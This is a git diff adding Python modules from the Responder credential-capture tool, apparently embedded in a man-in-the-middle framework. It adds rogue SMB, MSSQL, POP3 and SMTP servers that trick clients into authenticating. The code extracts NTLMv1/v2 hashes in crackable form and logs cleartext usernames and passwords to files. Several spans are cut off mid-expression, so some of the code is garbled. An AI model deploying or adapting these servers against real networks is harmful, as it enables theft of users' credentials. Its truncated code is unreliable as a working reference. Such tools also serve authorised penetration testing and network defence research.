str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) + + self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket)) + self.fields["SSPIBuffLen"] = struct.pack(" 60: + DomainLen = struct.unpack('H',Data[2:4])[0] + EncryptionValue = Data[PacketLen-7:PacketLen-6] + if re.search("NTLMSSP",Data): + return True + else: + return False + +#MS-SQL server class. 
+class MSSQL(BaseRequestHandler): + + def handle(self): + try: + while True: + data = self.request.recv(1024) + self.request.settimeout(0.1) + ##Pre-Login Message + if data[0] == "\x12": + buffer0 = str(MSSQLPreLoginAnswer()) + self.request.send(buffer0) + data = self.request.recv(1024) + ##NegoSSP + if data[0] == "\x10": + if re.search("NTLMSSP",data): + t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge) + t.calculate() + buffer1 = str(t) + self.request.send(buffer1) + data = self.request.recv(1024) + else: + ParseClearTextSQLPass(data,self.client_address[0]) + ##NegoSSP Auth + if data[0] == "\x11": + ParseSQLHash(data,self.client_address[0]) + except Exception: + pass + self.request.close() +################################################################################## +#SQL Stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/mssql/__init__.py b/core/protocols/mssql/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/pop3/POP3Server.py b/core/protocols/pop3/POP3Server.py new file mode 100644 index 0000000..8e7d700 --- /dev/null +++ b/core/protocols/pop3/POP3Server.py @@ -0,0 +1,69 @@ +################################################################################## +#POP3 Stuff starts here +################################################################################## + +class POP3Server(): + + def serve_thread_tcp(host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(POP_On_Off): + if POP_On_Off == "ON": + t = threading.Thread(name="POP", target=serve_thread_tcp, args=("0.0.0.0", 110,POP)) + t.setDaemon(True) + t.start() + return t + if POP_On_Off == "OFF": + return False + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + + +class POPOKPacket(Packet): + fields = OrderedDict([ + ("Code", "+OK"), + ("CRLF", "\r\n"), + ]) + +#POP3 server class. +class POP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(POPOKPacket())) + data = self.request.recv(1024) + if data[0:4] == "USER": + User = data[5:].replace("\r\n","") + responder_logger.info('[+]POP3 User: %s'%(User)) + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + if data[0:4] == "PASS": + Pass = data[5:].replace("\r\n","") + Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,User+":"+Pass, User+":"+Pass) + #print "[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass) + responder_logger.info("[+]POP3 Credentials from %s. 
User/Pass: %s:%s "%(self.client_address[0],User,Pass)) + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + else : + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + except Exception: + pass + +################################################################################## +#POP3 Stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/pop3/__init__.py b/core/protocols/pop3/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/smb/SMBPackets.py b/core/protocols/smb/SMBPackets.py new file mode 100644 index 0000000..a1d3fcb --- /dev/null +++ b/core/protocols/smb/SMBPackets.py @@ -0,0 +1,475 @@ +#! /usr/bin/env python +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + +#Calculate total SMB packet len. +def longueur(payload): + length = struct.pack(">i", len(''.join(payload))) + return length + +#Set MID SMB Header field. +def midcalc(data): + pack=data[34:36] + return pack + +#Set UID SMB Header field. +def uidcalc(data): + pack=data[32:34] + return pack + +#Set PID SMB Header field. +def pidcalc(data): + pack=data[30:32] + return pack + +#Set TID SMB Header field. +def tidcalc(data): + pack=data[28:30] + return pack + + +################################################################################## +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("errorcode", "\x00\x00\x00\x00" ), + ("flag1", "\x00"), + ("flag2", "\x00\x00"), + ("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\x00\x00"), + ("uid", "\x00\x00"), + ("mid", "\x00\x00"), + ]) +################################################################################## +#SMB Negotiate Answer LM packet. 
+class SMBNegoAnsLM(Packet): + fields = OrderedDict([ + ("Wordcount", "\x11"), + ("Dialect", ""), + ("Securitymode", "\x03"), + ("MaxMpx", "\x32\x00"), + ("MaxVc", "\x01\x00"), + ("Maxbuffsize", "\x04\x41\x00\x00"), + ("Maxrawbuff", "\x00\x00\x01\x00"), + ("Sessionkey", "\x00\x00\x00\x00"), + ("Capabilities", "\xfc\x3e\x01\x00"), + ("Systemtime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"), + ("Srvtimezone", "\x2c\x01"), + ("Keylength", "\x08"), + ("Bcc", "\x10\x00"), + ("Key", ""), + ("Domain", "SMB"), + ("DomainNull", "\x00\x00"), + ("Server", "SMB-TOOLKIT"), + ("ServerNull", "\x00\x00"), + ]) + + def calculate(self): + ##Convert first.. + self.fields["Domain"] = self.fields["Domain"].encode('utf-16le') + self.fields["Server"] = self.fields["Server"].encode('utf-16le') + ##Then calculate. + CompleteBCCLen = str(self.fields["Key"])+str(self.fields["Domain"])+str(self.fields["DomainNull"])+str(self.fields["Server"])+str(self.fields["ServerNull"]) + self.fields["Bcc"] = struct.pack("B", len(AsnLen+CalculateSecBlob)-3) + self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-6) + self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"]))) + self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"]))) + self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"]))) + self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob)) + + ###### Andxoffset calculation. + CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Action"])+str(self.fields["SecBlobLen"])+str(self.fields["Bcc"])+BccLen + + self.fields["Andxoffset"] = struct.pack(" 260: + SSPIStart = data[79:] + LMhashLen = struct.unpack(' 260: + SSPIStart = data[79:] + LMhashLen = struct.unpack(' 60: + outfile = "./logs/responder/SMB-NTLMv2-Client-"+client+".txt" + NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() + DomainLen = struct.unpack(' 25: + Hash = data[65+LMhashLen:65+LMhashLen+NthashLen] + responder_logger.info('[+]SMB-NTLMv2 hash captured from :%s'%(client)) + outfile = "./logs/responder/SMB-NTLMv2-Client-"+client+".txt" + pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] + var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] + Username, Domain = tuple(var) + Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper() + ParseShare(data) + WriteData(outfile,Writehash, Username+"::"+Domain) + responder_logger.info('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash)) + if NthashLen == 24: + responder_logger.info('[+]SMB-NTLMv1 hash captured from :%s'%(client)) + outfile = "./logs/responder/SMB-NTLMv1-Client-"+client+".txt" + pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] + var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] + Username, Domain = tuple(var) + writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal + ParseShare(data) + WriteData(outfile,writehash, Username+"::"+Domain) + responder_logger.info('[+]SMB-NTLMv1 complete hash is :%s'%(writehash)) + 
responder_logger.info('[+]SMB-NTLMv1 Username:%s'%(Username)) + responder_logger.info('[+]SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain)) + except Exception: + raise + +def IsNT4ClearTxt(data): + HeadLen = 36 + Flag2 = data[14:16] + if Flag2 == "\x03\x80": + SmbData = data[HeadLen+14:] + WordCount = data[HeadLen] + ChainedCmdOffset = data[HeadLen+1] + if ChainedCmdOffset == "\x75": + PassLen = struct.unpack(' 2: + Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","") + User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","") + #print "[SMB]Clear Text Credentials: %s:%s" %(User,Password) + responder_logger.info("[SMB]Clear Text Credentials: %s:%s"%(User,Password)) + +#SMB Server class, NTLMSSP +class SMB1(BaseRequestHandler): + + def handle(self): + try: + while True: + data = self.request.recv(1024) + self.request.settimeout(1) + ##session request 139 + if data[0] == "\x81": + buffer0 = "\x82\x00\x00\x00" + self.request.send(buffer0) + data = self.request.recv(1024) + ##Negotiate proto answer. + if data[8:10] == "\x72\x00": + #Customize SMB answer. + head = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data)) + t = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data)) + t.calculate() + final = t + packet0 = str(head)+str(final) + buffer0 = longueur(packet0)+packet0 + self.request.send(buffer0) + data = self.request.recv(1024) + ##Session Setup AndX Request + if data[8:10] == "\x73\x00": + IsNT4ClearTxt(data) + head = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data)) + t = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge) + t.calculate() + final = t + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(4096) + if data[8:10] == "\x73\x00": + if Is_Anonymous(data): + head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins. + final = SMBSessEmpty() + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + else: + ParseSMBHash(data,self.client_address[0]) + head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + final = SMBSession2Accept() + final.calculate() + packet2 = str(head)+str(final) + buffer2 = longueur(packet2)+packet2 + self.request.send(buffer2) + data = self.request.recv(1024) + ##Tree Connect IPC Answer + if data[8:10] == "\x75\x00": + ParseShare(data) + head = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data)) + t = SMBTreeData() + t.calculate() + final = t + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + ##Tree Disconnect. 
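+ ##The remaining branches below either acknowledge the request or answer with
+ ##STATUS_ACCESS_DENIED (error code \x22\x00\x00\xc0), keeping the client engaged
+ ##without ever exposing a real share.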
+ if data[8:10] == "\x71\x00": + head = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + final = "\x00\x00\x00" + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + ##NT_CREATE Access Denied. + if data[8:10] == "\xa2\x00": + head = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + final = "\x00\x00\x00" + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + ##Trans2 Access Denied. + if data[8:10] == "\x25\x00": + head = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + final = "\x00\x00\x00" + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + ##LogOff. + if data[8:10] == "\x74\x00": + head = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + final = "\x02\xff\x00\x27\x00\x00\x00" + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + + except Exception: + pass #no need to print errors.. + +#SMB Server class, old version. +class SMB1LM(BaseRequestHandler): + + def handle(self): + try: + self.request.settimeout(0.5) + data = self.request.recv(1024) + ##session request 139 + if data[0] == "\x81": + buffer0 = "\x82\x00\x00\x00" + self.request.send(buffer0) + data = self.request.recv(1024) + ##Negotiate proto answer. 
+ if data[8:10] == "\x72\x00": + head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data)) + t = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=Challenge) + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + ##Session Setup AndX Request + if data[8:10] == "\x73\x00": + if Is_LMNT_Anonymous(data): + head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + packet1 = str(head)+str(SMBSessEmpty()) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + else: + ParseLMNTHash(data,self.client_address[0]) + head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + packet1 = str(head)+str(SMBSessEmpty()) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + + except Exception: + self.request.close() + pass + +################################################################################## +#SMB Server stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/smb/SMBserver.py b/core/protocols/smb/SMBserver.py new file mode 100644 index 0000000..7922382 --- /dev/null +++ b/core/protocols/smb/SMBserver.py @@ -0,0 +1,28 @@ +import logging +import threading +import sys +from impacket import smbserver, LOG + +LOG.setLevel(logging.INFO) +LOG.propagate = False +#logging.getLogger('smbserver').setLevel(logging.INFO) +#logging.getLogger('impacket').setLevel(logging.INFO) + +formatter = logging.Formatter("%(asctime)s [SMBserver] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") +fileHandler = logging.FileHandler("./logs/mitmf.log") +streamHandler = logging.StreamHandler(sys.stdout) +fileHandler.setFormatter(formatter) +streamHandler.setFormatter(formatter) +LOG.addHandler(fileHandler) +LOG.addHandler(streamHandler) + +class SMBserver: + + def __init__(self, listenAddress = '0.0.0.0', listenPort=445, configFile=''): + + self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile) + + def start(self): + t = threading.Thread(name='SMBserver', target=self.server.start) + t.setDaemon(True) + t.start() \ No newline at end of file diff --git a/core/protocols/smb/__init__.py b/core/protocols/smb/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/smtp/SMTPPackets.py b/core/protocols/smtp/SMTPPackets.py new file mode 100644 index 0000000..65e252c --- /dev/null +++ b/core/protocols/smtp/SMTPPackets.py @@ -0,0 +1,74 @@ +#! /usr/bin/env python +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . 
+import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + +#SMTP Greating class +class SMTPGreating(Packet): + fields = OrderedDict([ + ("Code", "220"), + ("Separator", "\x20"), + ("Message", "smtp01.local ESMTP"), + ("CRLF", "\x0d\x0a"), + ]) + +class SMTPAUTH(Packet): + fields = OrderedDict([ + ("Code0", "250"), + ("Separator0", "\x2d"), + ("Message0", "smtp01.local"), + ("CRLF0", "\x0d\x0a"), + ("Code", "250"), + ("Separator", "\x20"), + ("Message", "AUTH LOGIN PLAIN XYMCOOKIE"), + ("CRLF", "\x0d\x0a"), + ]) + +class SMTPAUTH1(Packet): + fields = OrderedDict([ + ("Code", "334"), + ("Separator", "\x20"), + ("Message", "VXNlcm5hbWU6"),#Username + ("CRLF", "\x0d\x0a"), + + ]) + +class SMTPAUTH2(Packet): + fields = OrderedDict([ + ("Code", "334"), + ("Separator", "\x20"), + ("Message", "UGFzc3dvcmQ6"),#Password + ("CRLF", "\x0d\x0a"), + + ]) + + diff --git a/core/protocols/smtp/SMTPServer.py b/core/protocols/smtp/SMTPServer.py new file mode 100644 index 0000000..50002f9 --- /dev/null +++ b/core/protocols/smtp/SMTPServer.py @@ -0,0 +1,63 @@ +################################################################################## +#ESMTP Stuff starts here +################################################################################## + +class SMTP(): + + def serve_thread_tcp(self, host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(self, SMTP_On_Off): + if SMTP_On_Off == "ON": + t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=("0.0.0.0", 25,ESMTP)) + t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=("0.0.0.0", 587,ESMTP)) + + for t in [t1, t2]: + t.setDaemon(True) + t.start() + + if SMTP_On_Off == "OFF": + return False + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +#ESMTP server class. +class ESMTP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(SMTPGreating())) + data = self.request.recv(1024) + if data[0:4] == "EHLO": + self.request.send(str(SMTPAUTH())) + data = self.request.recv(1024) + if data[0:4] == "AUTH": + self.request.send(str(SMTPAUTH1())) + data = self.request.recv(1024) + if data: + Username = b64decode(data[:len(data)-2]) + self.request.send(str(SMTPAUTH2())) + data = self.request.recv(1024) + if data: + Password = b64decode(data[:len(data)-2]) + Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,Username+":"+Password, Username+":"+Password) + #print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password) + responder_logger.info("[+]SMTP Credentials from %s. 
User/Pass: %s:%s "%(self.client_address[0],Username,Password)) + + except Exception: + pass + +################################################################################## +#ESMTP Stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/smtp/__init__.py b/core/protocols/smtp/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/responder/__init__.py b/core/responder/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/responder/common.py b/core/responder/common.py new file mode 100644 index 0000000..cd0ea40 --- /dev/null +++ b/core/responder/common.py @@ -0,0 +1,102 @@ +#common functions that are used throughout the Responder's code + + +import re + +#Function used to write captured hashs to a file. +def WriteData(outfile, data, user): + if os.path.isfile(outfile) == False: + with open(outfile,"w") as outf: + outf.write(data) + outf.write("\n") + outf.close() + if os.path.isfile(outfile) == True: + with open(outfile,"r") as filestr: + if re.search(user.encode('hex'), filestr.read().encode('hex')): + filestr.close() + return False + if re.search(re.escape("$"), user): + filestr.close() + return False + else: + with open(outfile,"a") as outf2: + outf2.write(data) + outf2.write("\n") + outf2.close() + +def Parse_IPV6_Addr(data): + if data[len(data)-4:len(data)][1] =="\x1c": + return False + if data[len(data)-4:len(data)] == "\x00\x01\x00\x01": + return True + if data[len(data)-4:len(data)] == "\x00\xff\x00\x01": + return True + else: + return False + +#Function name self-explanatory +def Is_Finger_On(Finger_On_Off): + if Finger_On_Off == True: + return True + if Finger_On_Off == False: + return False + +def RespondToSpecificHost(RespondTo): + if len(RespondTo)>=1 and RespondTo != ['']: + return True + else: + return False + +def RespondToSpecificName(RespondToName): + if len(RespondToName)>=1 and RespondToName != ['']: + return True + else: + return False + +def RespondToIPScope(RespondTo, ClientIp): + if ClientIp in RespondTo: + return True + else: + return False + +def RespondToNameScope(RespondToName, Name): + if Name in RespondToName: + return True + else: + return False + +##Dont Respond to these hosts/names. +def DontRespondToSpecificHost(DontRespondTo): + if len(DontRespondTo)>=1 and DontRespondTo != ['']: + return True + else: + return False + +def DontRespondToSpecificName(DontRespondToName): + if len(DontRespondToName)>=1 and DontRespondToName != ['']: + return True + else: + return False + +def DontRespondToIPScope(DontRespondTo, ClientIp): + if ClientIp in DontRespondTo: + return True + else: + return False + +def DontRespondToNameScope(DontRespondToName, Name): + if Name in DontRespondToName: + return True + else: + return False + +def IsOnTheSameSubnet(ip, net): + net = net+'/24' + ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16) + netstr, bits = net.split('/') + netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16) + mask = (0xffffffff << (32 - int(bits))) & 0xffffffff + return (ipaddr & mask) == (netaddr & mask) + +def FindLocalIP(Iface): + return OURIP \ No newline at end of file diff --git a/core/responder/fingerprinter/Fingerprint.py b/core/responder/fingerprinter/Fingerprint.py new file mode 100644 index 0000000..8eda227 --- /dev/null +++ b/core/responder/fingerprinter/Fingerprint.py @@ -0,0 +1,121 @@ +#! 
/usr/bin/env python +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +import re,sys,socket,struct,string +from socket import * +from ..odict import OrderedDict +from ..packet import Packet + +def longueur(payload): + length = struct.pack(">i", len(''.join(payload))) + return length + +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("error-code", "\x00\x00\x00\x00" ), + ("flag1", "\x00"), + ("flag2", "\x00\x00"), + ("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\x00\x00"), + ("uid", "\x00\x00"), + ("mid", "\x00\x00"), + ]) + +class SMBNego(Packet): + fields = OrderedDict([ + ("wordcount", "\x00"), + ("bcc", "\x62\x00"), + ("data", "") + ]) + + def calculate(self): + self.fields["bcc"] = struct.pack(". +import re,socket,struct +from socket import * +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + +def longueur(payload): + length = struct.pack(">i", len(''.join(payload))) + return length + +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("error-code", "\x00\x00\x00\x00" ), + ("flag1", "\x00"), + ("flag2", "\x00\x00"), + ("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\x00\x00"), + ("uid", "\x00\x00"), + ("mid", "\x00\x00"), + ]) + +class SMBNego(Packet): + fields = OrderedDict([ + ("wordcount", "\x00"), + ("bcc", "\x62\x00"), + ("data", "") + ]) + + def calculate(self): + self.fields["bcc"] = struct.pack("i", len(''.join(payload))) + return length + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + + +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("error-code", "\x00\x00\x00\x00" ), + ("flag1", "\x08"), + ("flag2", "\x01\x00"), + ("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\x3c\x1b"), + ("uid", "\x00\x00"), + ("mid", "\x00\x00"), + ]) + +class SMBNegoData(Packet): + fields = OrderedDict([ + ("wordcount", "\x00"), + ("bcc", "\x54\x00"), + ("separator1","\x02" ), + ("dialect1", 
"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"), + ("separator2","\x02"), + ("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"), + ]) + def calculate(self): + CalculateBCC = str(self.fields["separator1"])+str(self.fields["dialect1"])+str(self.fields["separator2"])+str(self.fields["dialect2"]) + self.fields["bcc"] = struct.pack(". +import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) +################################################################################## +#SMB Client Stuff +################################################################################## + +def longueur(payload): + length = struct.pack(">i", len(''.join(payload))) + return length + +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("error-code", "\x00\x00\x00\x00" ), + ("flag1", "\x00"), + ("flag2", "\x00\x00"), + ("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\x00\x4e"), + ("uid", "\x00\x08"), + ("mid", "\x00\x00"), + ]) + +class SMBNego(Packet): + fields = OrderedDict([ + ("Wordcount", "\x00"), + ("Bcc", "\x62\x00"), + ("Data", "") + ]) + + def calculate(self): + self.fields["Bcc"] = struct.pack("i", len(''.join(payload))) + return length + +#Set MID SMB Header field. +def midcalc(data): + pack=data[34:36] + return pack + +#Set UID SMB Header field. +def uidcalc(data): + pack=data[32:34] + return pack + +#Set PID SMB Header field. +def pidcalc(data): + pack=data[30:32] + return pack + +#Set TID SMB Header field. +def tidcalc(data): + pack=data[28:30] + return pack + +#SMB Header answer packet. +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("errorcode", "\x00\x00\x00\x00" ), + ("flag1", "\x80"), + ("flag2", "\x00\x00"), + 